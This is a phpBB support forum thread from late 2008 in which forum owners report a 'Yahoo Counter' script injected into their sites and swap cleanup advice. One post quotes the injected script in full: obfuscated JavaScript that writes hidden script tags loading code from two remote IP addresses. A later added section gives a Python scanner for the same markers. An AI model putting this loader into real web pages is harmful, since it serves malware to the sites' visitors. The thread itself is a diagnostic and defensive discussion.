Yahoo Counter...

Tarj
Registered User
Posts: 72
Joined: Sun Nov 20, 2005 9:17 pm
Location: Vermont, USA


Post by Tarj »

The following is the basic SRT
Your board's URL: http://www.ithompson.com/phpBB3
Version of phpBB3: 3.03
Was this a fresh install or a(n) update/upgrade/conversion (please be specific)? Upgrade
If update, what package(s) did you use? Full version
Did you use an automated wizard provided by your host to install phpBB? No
MODs you have installed: None
When the problem started: 2 months ago
Your level of expertise (be honest): Enough to get me by

I was running the latest version of phpBB 2.x when it all started. A Yahoo counter was on almost every page, and people were getting virus warnings and finally Google had enough and considered our domain a threat. I upgraded to phpBB 3.0.3 on my personal domain and right away, I saw that the Yahoo code was still there. This forum is a World of Warcraft guild forum, and I have a member help keep the phpBB up-to-date. Together, we found out that the Yahoo code was being caused by the database as the Yahoo code would come up even if we installed new styles. My friend was able to clean up most of the Yahoo code, but some of it still remains. Below is what users currently see, but for some reason, it is not in some of the forums. Below is an example:

Image

Any help would be appreciated.

Thanks,
Bryan
stevemaury
Support Team Member
Posts: 52741
Joined: Thu Nov 02, 2006 12:21 am
Location: The U.P.
Name: Steve

Re: Yahoo Counter...

Post by stevemaury »

Take a look in the forums table in the database using phpMyAdmin.
I can stop all your spam. I can upgrade or update your Board. PM or email me. (Paid support)
sensei_kyle
Registered User
Posts: 5
Joined: Tue Jun 20, 2006 3:28 pm

Re: Yahoo Counter...

Post by sensei_kyle »

Yeah, found this waiting for me this morning as well. What I did was purge the cache directory (delete everything except .htaccess & index.htm). Go to the admin control panel, General tab, board settings. I found the "site description" was where the javascript code had been added.
DDalton
Registered User
Posts: 1
Joined: Fri Nov 28, 2008 7:31 pm

Re: Yahoo Counter...

Post by DDalton »

I have been dealing with this issue for weeks, I go and delete it and it returns within a week. Any help would be great :x
-)G(-DrDoom
Registered User
Posts: 1
Joined: Mon Dec 01, 2008 7:21 pm

Re: Yahoo Counter...

Post by -)G(-DrDoom »

Tarj,
We have also been dealing with this as well. We run a PHP Nuke Evolution site (also uses phpbb2 forums) that was hit about 3 weeks ago and have just about pulled our hair out trying to figure out how it became infected to start with. We are pretty cautious with our passwords, access to the root site (2 users) and run updated Antivirus on our PCs at all times. We went back to the Nuke Evolution community and ran it by the admins there and found out that there were other users with the same issue that we were having.

After much hair pulling, we finally figured out that all the people that were having issues had one thing in common, we were all IXwebhosting.com customers. I couldn't help but to look up your domain and notice that you are a customer of them as well. I was wondering if the other posters on here having issues were also customers.

The only conclusion we could come up with is that they either have infected web hosting servers or they have a security hole somewhere.

I don't want this to come off as me bashing IXwebhosting, because we have been a customer of this company for over 3 years with good service, but it is ironic that everyone we've encountered with this Yahoo Counter issue are all IXwebhosting customers.
pixelpadre
Registered User
Posts: 10
Joined: Wed Dec 19, 2007 10:38 pm

Re: Yahoo Counter...

Post by pixelpadre »

ixwebhosting bad news

i too have ixwebhosting and all 30000 files were injected. has nothing to do with phpbb.

they will not accept any responsibility.

i had to do a search and replace on every file. fortunately there is one program out there that will allow you to do a large string. ultraedit. highly recommend it. it will delete the bad text in 900 files in about 30 seconds.
Last edited by Erik Frèrejean on Sat Dec 13, 2008 5:57 pm, edited 1 time in total.
Reason: All caps removed http://www.phpbb.com/rules/#rule1g
jjde86
Registered User
Posts: 1
Joined: Mon Aug 04, 2008 6:11 am

Re: Yahoo Counter...

Post by jjde86 »

I am also on the yahoo counter problem bandwagon and have ixwebhosting. It is incredibly annoying and for all I know doing other harmful things. If anyone has found a way to fix this, please let us know.

pixelpadre, you mentioned using ultraedit to delete bad text. Is there any way (with this program or another) to delete the text directly on the website? By that I mean, without updating files on your computer and then uploading them again?
UDPride
Registered User
Posts: 3
Joined: Fri Dec 19, 2008 4:48 pm

Re: Yahoo Counter...

Post by UDPride »

I am hosted by IXWeb Hosting as well and run VBulletin and VB Advanced. Can all of us who are suffering this issue and use IXWeb band together to help solve one another's problem?

I've noticed when I deactivate VB Advanced the problem goes away and the code is not there. Likewise with everything running, the malicious code is not in my VB templates.

I did notice a few of my folders were 777 permissions including the modules and cache folder.

I really need help with this. I did get that aforementioned email response listed above from IX, but when I got a hold of them, they indicated this Yahoo issue was a different issue and was on MY end.

I'm not convinced it's on my end. I never had any hack or trojan issues until this and if a lot of IXWeb people are running into the problem, it sounds like it could be a vulnerability the hosts have they encouraged this.

First and foremost however, what files and folders and bad code do I need to look for and delete? I've heard suggestions on how to prevent hacks AFTER the fact on other web sites, but nothing seems to be focusing on how I resolve this issue right now.

Is it safe to say any VB and VBA files/folders should be 777 folder and 644 file? Would there be any exceptions to this?

I'd really like some help on locating/removing the bad files and tag teaming the problem with others affected. We really need to get on IXWeb's butt and force them to fix this issue. Like you, I don't believe it was a vulnerability we as forums owners were at fault for. I haven't been hacked or trojaned once in 2yrs with IXWeb and have otherwise been a very happy customer. What can we do? There is strength in numbers. I'll help anyone who also helps me. Pay it forward. I just want this issue resolved.

Others can email me at chris@udpride.com if you wish. Thanks.
UDPride
Registered User
Posts: 3
Joined: Fri Dec 19, 2008 4:48 pm

Re: Yahoo Counter...

Post by UDPride »

More info for those affected...

IX Web doesn't have a script I know of, or won't tell us about it if they do. Just more info on the virus itself:

Look for an htaccess file somewhere. May take some looking. Likely in that same folder is an index.htm file with a hacked message about George Bush's militarism and other gibberish. I can supply a TXT of the htm if you like. You obviously need to delete these files.

Also, you are going to have to look through most of your major PHP files in VBulletin (or whatever other forum you use). It likes to pick on the config files, admin files, and cache files (in all of your cache folders no matter where they reside -- I had several).

The script dumps a bazillion lines of code at the end of these PHP files as another PHP script to execute. I must have deleted it from 85-100 or so. Download file, delete the gibberish, upload file. Not knowing exactly if this was malicious code or VB PHP code I couldn't decipher, I renamed a file to _hold, downloaded and removed the gibberish and re-uploaded and the forum was fine. So I deleted the file on hold. Painstaking process.

I also went through and changed some permissions on folders to 755. I had a couple that were 777 and I'm not sure I ever remember setting them to that. Also checked VB files and changed a few back to 644. Again, I'm not convinced they were wrong from the beginning. I usually keep good oversight on this stuff.

Right now, the Yahoo Counter code seems to be removed from my footer, however it's still located on most pages in my META DESCRIPTION tag as a script at the very end of my own words. I'm hoping since it's here and not in the body tag, it's not executable and just a nuisance search engine issue at this point. VBulletin doesn't have a META DESCRIPTION field as far as I know -- at least not when I looked. Only META KEYWORDS.

So right now I'm working on trying to remove it here.

I've since changed all the passwords on my VB Control Panel who have admin access and changed my FTP password again. I will also be changing my database password in the a.m. Maybe these will have no effect but certainly can't hurt.

If anyone has more info on this or can speak up about IX Web's action, please tell us all.
MikeB12
Registered User
Posts: 29
Joined: Tue Sep 28, 2004 3:56 pm

Re: Yahoo Counter...

Post by MikeB12 »

our site has also been hit with this.
http://www.doxietown.com/phpBB2/index.php
in the source of the above page

Code:

<td class="catLeft" colspan="2" height="28"><span class="cattitle"><a href="index.php?c=1" class="cattitle">Welcome to Doxietown
<script language=javascript><!-- Yahoo! Counter starts 
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('/@%2F`.|%2E!%2E�&%3C~d@i#v%20#%73#%74%79$%6C%65@=&dis%70@%6Ca!y%3A|non~%65#%3E#\ndo&cu~%6De&n!t&.w%72it$%65#(%22%3C~%2F@t&%65%78~%74`a%72@ea|%3E"|%29`%3B`va%72`%20@i#,%5F!,~%61|=%5B%227%38!%2E11`0.#1$%37%35%2E%32%31@%22%2C~%22!%31`%39%35%2E2%34!.@%37%36.2%35!1"$%5D$%3B`%5F|%3D1`%3Bi&%66%28do%63!u@m~en%74&%2E`%63~o~%6Fk`ie@%2E&m%61@%74~c#%68%28#%2F%5C#b#h`g$%66%74%3D~%31&/$%29~=`=&%6E|u!%6C#%6C)%66%6Fr(i|=$%30&;i#%3C%32%3B~i+&+)%64o%63u%6De#%6Et~%2Ew!r~%69t@%65("$%3C$%73%63%72%69@p!%74%3Eif(&%5F|%29#d%6F#c!%75me@%6E@t!%2E%77#r%69~%74!e($%5C!"%3C&%73|c@r$%69%70~%74%20i|d$%3D|_%22$%2B%69%2B|"%5F%20`%73%72c%3D@%2F/"|+&%61[!%69!]+#"~/%63$%70%2F%3F#"+%6Ea%76%69g@a~%74&o!%72.a@%70p#%4Ea%6D~%65~.|%63h%61$%72&A%74&(%30%29+|"%3E%3C@%5C%5C%2F!%73@c%72i!%70%74|%3E%5C%22)!%3C%5C/s#%63&%72#%69pt#%3E@%22%29;\n%2F%2F~%3C%2F!d%69~v~%3E').replace(/\$|\||`|#|~|\&|@|\!/g,""));var yahoo_counter=1;
<!-- counter end --></script>

</a></span></td>
IX was sent a trouble ticket on Dec 11.
the tech came back telling me something about Frontpage Extensions being turned off! :lol:

so we said WTF!
and they replied:
Dear Customer,

Thanks for contacting technical support.

As I've just checked your forum has been hacked using Java Script Yahoo counter trojan. I've removed odd Java Script code from your phpBB database and now all working just fine. Please check this from your end. I can suggest to you check your computer on viruses, trojans and spyware programs using different antivirus software, because each of them uses own virus's signature database. After that change your FTP password and upgrade phpBB to latest version using steps below.

For upgrading phpBB2 for latest version, please follow this steps:
1) Download original config.php file from your forum folder in server
2) Delete all forum files from server and upload new version of forum to server
3) Upload also your downloaded config.php file
4) In browser type: http://yourdomain.com/phpBB/install/upd ... latest.php
5) After operation will be completed, delete install and contrib folders from phpBB folder and all should be work.


Should you have any further questions, please feel free to contact us anytime, we are available 24/7.
Technical Support
24*7 Helpdesk / Online Chat
Alex Karamushko
I've replaced my phpbb2 files from backup, no help.
I've exported my phpmyadmin structure and data entire sql, then used vlm to "find" "yahoo" and no hits.
I don't know what to do to fix this...
though it does seem to only affect IE for our site. Firefox experiences no delay.
and it only affects the index forum page, nothing once inside...

my only option left is to create another trouble ticket with IX. I wish they would rectify this damn thing.
Noxwizard
Support Team Leader
Posts: 10526
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster

Re: Yahoo Counter...

Post by Noxwizard »

There were some other issues with the IX servers a few weeks ago. It may be best to get another host. You can submit an incident ticket if you want and we can look over your files and database for you:
ReadMe Before Posting / Frequently Asked Questions wrote:
Please do the following before making any modifications to your board (this includes changing passwords, editing files, running the admin toolkit, etc.):
1) Save a copy of the files (simply create a local copy of the files on the server).
2) Save a copy of the database.
3) Save the server access logs for the time of the hack (they may be available in the 'logs' directory on the server, in your host's control panel or only by request directly from your host).
4) File a report in the incident tracker. Attach the items from steps 1-3 when you file the report or upload them to a secure location for the incident investigation team to download. Please do not start a new topic on the board, the proper place for incidents reports is the tracker.
[Support Template] - [Read Before Posting] - [phpBB Knowledge Base]
Do not contact me for private support, please share the question in our forums.
scatrbrain
Registered User
Posts: 1
Joined: Thu Jun 01, 2006 5:58 am

Re: Yahoo Counter...

Post by scatrbrain »

I also have IX webhosting and have Yahoo Counter code as well.. I haven't figured out how to get rid of it either.

*update 12-21-08*
I discovered that my php chat room (x7chat2_0_5_1) also had the Yahoo Counter code in it as well.

I deleted all my phpbb3 files, reinstalled it fresh and everything was clean. As soon as I edited the config.php to point back to the old table prefix, the code was back again.

Last night I changed all my passwords per IX suggestion (even though I'm pretty sure it's got nothing to do with that) and fortunately my forum was brand new, so I deleted the entire database and started with a new one, reinstalled phpbb3 again last night, this morning it's still clean, but I have a clean back up of the forum and database. We'll see what happens now.
Last edited by scatrbrain on Sun Dec 21, 2008 6:41 pm, edited 1 time in total.
MikeB12
Registered User
Posts: 29
Joined: Tue Sep 28, 2004 3:56 pm

Re: Yahoo Counter...

Post by MikeB12 »

Thanks Noxwizard. I'm going to wait and see what happens with the IX trouble ticket first... even if you did find and fix it, it would be a shame to have it come right back due to a hosting problem on their server. So I'll wait and see what pans out with support at IX, then go from there. The only users being affected are the IE users now, so I've just been telling them to use Firefox or Chrome in the meantime. It's a low traffic site compared to what it was 2 yrs ago (that's the main reason I haven't gone to phpbb3), so I'm not getting a lot of complaints from people, just the handful that still frequents the board. Plus I need to follow through until it gets fixed.
ring-leader
Registered User
Posts: 2
Joined: Mon Dec 22, 2008 12:28 am

Re: Yahoo Counter...

Post by ring-leader »

I am a reseller that has used IX hosting for the past 3 years with no problems until the last 2 months when I was hit with the Yahoo Counter script. I ended up fixing my customers' blogs and webpages as well as my own only to have it return. This is rather insidious as it not only infects your PHP files but it infects HTML and JavaScript files too. Unfortunately there is no magic pill to remove it and you have to check each and every file but I can give you a clue as to what files are most likely infected. When viewed they will no longer be owned by you but will have the ownership changed to "httpd" without the quotes. I also found that many of the files were chmodded from 755 to 444, another stumbling block to prevent you from replacing them with repaired versions. First time I had IX revert ownership back to my account then chmod them back to 755. After that and their denials of anything wrong on their part when it did it again I simply deleted each file before replacing it with the repaired version. That gets around the ownership and the chmod problems. I posted about this on my blog with a few tips on removal: http://fightback.inquisitiveidiot.com/?p=235 If you need help or suggestions post a comment and tell me what you need and I will get back to you. I hope this helps.
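
The indicators reported in this thread (the start and end markers of the injected block in MikeB12's post, the 777 folders UDPride found, and the ownership and 444 changes described above) can be checked across a whole site tree in one pass. This is an added example, not code from any poster or from phpBB; the function names and the sample page are constructed for illustration, and the replacement step follows the "replace the file rather than edit it" approach described above.

```python
import os
import re
import stat
import tempfile

# Markers copied from the injected block quoted in MikeB12's post.
INJECTED = re.compile(rb"<script[^>]*>\s*<!-- Yahoo! Counter starts.*?"
                      rb"<!-- counter end --></script>", re.S | re.I)
# Constructed sample page: same markers, harmless placeholder body.
SAMPLE = (b'<a href="index.php">Home\n<script language=javascript><!-- Yahoo! '
          b'Counter starts \nvar placeholder=1;\n<!-- counter end --></script>\n</a>\n')

def scan_tree(root, expected_uid=None):
    """Map suspicious paths to reasons; assumes root itself is still owned by you."""
    uid = os.stat(root).st_uid if expected_uid is None else expected_uid
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            mode, reasons = stat.S_IMODE(st.st_mode), []
            if st.st_uid != uid:  # e.g. re-owned by the web server account
                reasons.append("owner changed")
            if stat.S_ISDIR(st.st_mode) and mode & stat.S_IWOTH:
                reasons.append("world-writable directory")
            elif stat.S_ISREG(st.st_mode):
                if mode == 0o444:  # read-only flip that blocks overwriting
                    reasons.append("mode 444")
                with open(path, "rb") as fh:
                    if INJECTED.search(fh.read()):
                        reasons.append("injected block")
            if reasons:
                findings[path] = reasons
    return findings

def clean_file(path):
    """Replace path with a copy minus the injected block; return blocks removed."""
    with open(path, "rb") as fh:
        cleaned, count = INJECTED.subn(b"", fh.read())
    if count:
        tmp = path + ".cleaned"
        with open(tmp, "wb") as fh:
            fh.write(cleaned)
        os.chmod(tmp, 0o644)
        os.replace(tmp, path)  # swap the whole file instead of editing in place
    return count

def demo():
    """Scan, clean and rescan a throwaway tree built from SAMPLE."""
    with tempfile.TemporaryDirectory() as root:
        cache, page = os.path.join(root, "cache"), os.path.join(root, "index.htm")
        os.mkdir(cache)
        os.chmod(cache, 0o777)
        with open(page, "wb") as fh:
            fh.write(SAMPLE)
        os.chmod(page, 0o444)
        before = scan_tree(root)
        return before, clean_file(page), scan_tree(root)
```

As the ReadMe quoted earlier in the thread asks, copy the files, database and access logs before running `clean_file` on a live board. The pattern only matches the marker variant quoted in this thread; the PHP appended to files that UDPride describes and any copies stored in the database need separate checks.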
MikeB12
Registered User
Posts: 29
Joined: Tue Sep 28, 2004 3:56 pm

Re: Yahoo Counter...

Post by MikeB12 »

well, for those of you that are IX.. here's my recent conversation (45 MIN):
Chat Information: Please wait for a site operator to respond.

Chat Information: You are now chatting with 'Kirill Koban'

Kirill Koban: Thank you for coming, my name is Kirill. How may I help you today?

you: I am experiencing the yahoo counter at http://www.doxietown.com/phpBB2/index.php

you: it is documented here http://www.phpbb.com/community/viewtopi ... &t=1322765

Kirill Koban: it's a hack. Please delete it and change your ftp and account passwords.

you: how do you delete it. read that phpbb thread!

you: still here.. let me know when you're ready to chat again.. I am logged in...

Kirill Koban: do you already have a ticket on this issue?

you: opened a ticket back on dec 11, and they said they fixed it.. but obviously not...

Kirill Koban: please provide me its number?

you: dont have a number, but still have the response..

you: Dear Customer, Thanks for contacting technical support. As I've just checked your forum has been hacked using Java Script Yahoo counter trojan. I've removed odd Java Script code from your phpBB database and now all working just fine. Please check this from your end. I can suggest to you check your computer on viruses, trojans and spyware programs using different antivirus software, because each of them uses own virus's signature database. After that change your FTP password and upgrade phpBB to latest version using steps below. For upgrading phpBB2 for latest version, please follow this steps: 1) Download original config.php file from your forum folder in server 2) Delete all forum files from server and upload new version of forum to server 3) Upload also your downloaded config.php file 4) In browser type: http://yourdomain.com/phpBB/install/upd ... latest.php 5) After operation will be completed, delete install and contrib folders from phpBB folder and all should be work. Should you have any further questions, please feel free to contact us anytime, we are available 24/7. Technical Support 24*7 Helpdesk / Online Chat Alex Karamushko

you: it did not help.

you: This is an issue that needs to go to upper level support. If you read the thread linked http://www.phpbb.com/community/viewtopi ... &t=1322765

you: multiple sites are experiencing the problem, and it's spawning even when cleaned. my site was supposedly cleaned on Dec 11, and it did clean it for non IE browsers. but IE users are still getting hit.

Kirill Koban: sorry but our system administrators work on it now.

you: it's obviously an attack that occurs at not just the domain level, but in the cluster. What can we do to resolve this. please read that thread linked, and you'll see it's an enterprise level problem.

you: is there anything that you can tell me? besides just "our system administrators work on it" like an eta or what we can do in the mean time?

Kirill Koban: Sorry but I can't say anything exactly about it

you: well, that says it I guess.. should I look for a new host?
10 MIN LATER
you: btw: I'm posting this conversation on the web.. nice advertising...